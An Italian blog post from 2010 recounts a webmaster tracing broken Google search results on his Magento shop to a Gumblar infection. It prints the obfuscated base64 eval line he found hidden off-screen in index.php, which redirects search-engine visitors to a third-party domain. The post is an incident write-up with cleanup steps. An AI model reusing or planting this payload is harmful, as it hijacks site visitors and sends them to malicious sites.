Home » Blog di Lollo » Giugno 2010 » Problema risultati ricerca con google

Problema risultati ricerca con google

Votato: 1 volta

Tags: google, Gumblar, link errati, risultati ricerca google

19 giu, 2010 17:02

risultato ricerca google

risultato link ricerca google errato

Sono alcuni giorni che riscontro dei problemi quando effettuo una ricerca con google.
Il sito è un e-commerce sviluppato con magento.
Non credo che il problema sia dovuto a Magento o ad un errore di sviluppo del sito, ma il problema sia effettivamente di google.

Come dalle foto mostrate, nell'intento di trovare il sito http://morgan-softair.com inserisco nel motore di ricerca google, le parole chiave morgan softair, il risultato della ricerca trova effettivamente i link al sito (i primi 2 risultati), (vedi foto risultato ricerca), però se selezioniamo entrambi i link, si aprono pagine strane (vedi foto risultato link).
Mentre selezionando la versione della pagina dalla cache di google, si apre il sito corretto.

Aggiornamento del 21 giugno 2010:
A quanto pare il problema è di un virus di nome Gumblar, che una volta infettato il sito, infetta i pc che lo visitano, sfruttando falle di protezione di PDF reader obsoleti, vecchie versioni di dreamweaver, o applicazioni Flash non aggiornate.
Per mezzo di Gumblar, i cracker puntano a modificare, in modo artificioso, i risultati di ricerca ottenuti sulle macchine infette, indirizzando gli utenti verso siti fraudolenti o comunque pericolosi, però io credo che questo possa accadere anche su pc non infetti (nel caso si effettui una ricerca verso siti infettati), in quanto il problema di reindirizzamento l'ho constatato su tutti i pc che ho avuto modo di provare, sia con winXP , che Ubuntu, che MAC.
Quindi è anche il sito infettato che confonde gli spider di google, che quindi indicizza in maniera scorreta il sito infetto, e ne produce risultati con link modificati.

Inoltre si impossessa delle credenziali FTP, quindi una volta che si riesce ad eliminare, bisogna cambiare la password di collegamento FTP.
Ora l'obiettivo e trovarlo e poi cercare di eliminarlo!

Aggiornamento del 23 giugno 2010:
Trovarlo è molto difficile, nessun antivirus trovato sembra riuscire a scovarlo.
Bisogna cercare a mano tra i centinaia di file di codice, menglio quindi sovrascrivere quanti più file possibile, con particolare attenzine ai file javascript e poi richiedere una nuova verifica a google tramite gli strumenti per i webmaster. Ma la ricerca di un riscontro tangibile, circa il successo, ancora manca...

Aggiornamento del 24 giugno 2010:
Dopo aver comunque sovrascritto quanti file sensibili possibile, nel file index.php in una posizione molto nascosta (essendo traslata, a destra, per uscire fuori dallo schermo), ho trovato la seguente riga di comando, che inizialmente mi era sfuggita ad un primo controllo, essendo per l'appunto nascosta:

eval(base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRV
JdLCJnb29nbGUiKSkgewoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkV
GRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJd
LCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImlu
dXJsIikpewoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUV
FBfUkVGRVJFUl0sJGtrKTsKCQlpZiAoc3RyaXN0cigka2tbMV0sIiYiKSkgewoJCQlw
cmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOwoJCQkka2V5d29
yZD11cmxkZWNvZGUoJGtleTJbMV0pOwoJCX1lbHNlIHsKCQkJJGtleXdvcmQ9d
XJsZGVjb2RlKCRra1sxXSk7CgkJfQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly
9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRrZXl3b3JkKTsKCQlleGl0KCk7Cgl9Cg
p9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9
vIikpIHsKcHJlZ19tYXRjaCAoIi9wXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkV
SRVJdLCRrayk7CgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnbmZkZnRo
cnYuYmVlLnBsLz9xPSIuJGtrWzFdKTsKCQlleGl0KCk7Cn1lbHNlaWYgKHN0cml
zdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7CnByZWdfbWF
0Y2ggKCIvcVw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2sp
OwoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wb
C8/cT0iLiRra1sxXSk7CgkJZXhpdCgpOwp9Cgk="));

Questa riga di codice, che io spezzetto per motivi di impaginazione, generava il codice php per il reindirizzamento pirata all'interno del sito, sia non permettendomi di effettuare alcune azioni all'interno del pannello di amministrazione (rimandando spesso a siti strani), che confondendo gli spider di google. In pratica era il cuore del virus. Rimosso questo codice, non ho più riscontrato problemi. Particolarmente importante comunque è l'eliminazione di eventuali backdoor in altre parti codice, cosa che credo di aver preso, sovrascrivendo quanti file possibile.
Appena finito il lavoro sono corso a cambiare password FTP e segnalare la richiesta di riverifica da parte di google.

Questa volta credo di averla spuntata, anche se era una versione di Gumblar più evoluta essendo il suo codice inserito criptato.

Speriamo bene...

Modulo valutazione post Per votare il post effettuare prima il Log in

Modulo invio commento post Per inserire un commento effettuare prima il Log in

Avviso per l'utente

ATTENZIONE JAVASCRIPT E' DISABILITATO!

Anche se la maggior parte delle funzionalità di questo blog, sono disponibili anche senza javascript, per un migliore utilizzo si consiglia di abilitare javascript nel tuo browser.